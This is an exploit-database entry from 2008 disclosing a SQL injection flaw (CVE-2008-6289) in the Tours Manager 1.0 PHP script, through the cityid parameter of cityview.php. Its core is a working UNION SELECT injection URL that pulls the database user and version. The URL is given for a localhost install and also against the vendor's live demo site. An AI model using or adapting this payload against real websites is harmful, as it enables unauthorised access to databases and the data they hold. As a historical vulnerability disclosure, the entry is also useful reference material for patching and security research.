Tours Manager 1.0 - SQL Injection

Author: G4N0K
type: webapps
platform: php
port: 
date_added: 2008-11-03 
date_updated: 2016-12-30 
verified: 1 
codes: OSVDB-49563;CVE-2008-6289 
tags: 
aliases:  
screenshot_url:  
application_url: 

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
								IN THE NAME OF ALLAH
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Tours Manager v1 (cityview.php cityid) SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[~] Script:         	Tours Manager v1
[~] Language :         	PHP
[~] Website:	     	http://www.toursmanager.com
[~] Type :             	Commercial
[~] Report-Date :     	04/11/2008


--[ Founder ]--
G4N0K <mail.ganok[at]gmail.com>


--[ Exploit ]--
[+] http://localhost/[path]/cityview.php?cityid=-5+UNION+ALL+SELECT+1,2,3,concat(user(),0x3a,version()),5--



--[ L!ve ]--
[+] http://www.toursmanager.com/demo/cityview.php?cityid=-5+UNION+ALL+SELECT+1,2,3,concat(user(),0x3a,version()),5--



--[ Greetz ]--
[~] ALLAH
[~] Tornado2800 <Tornado2800[at]gmail.com>
[~] Hussain-X <darkangel_g85[at]yahoo.com>

//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
//ALLAH, forgimme...

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
exit(); //EoX
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2008-11-04]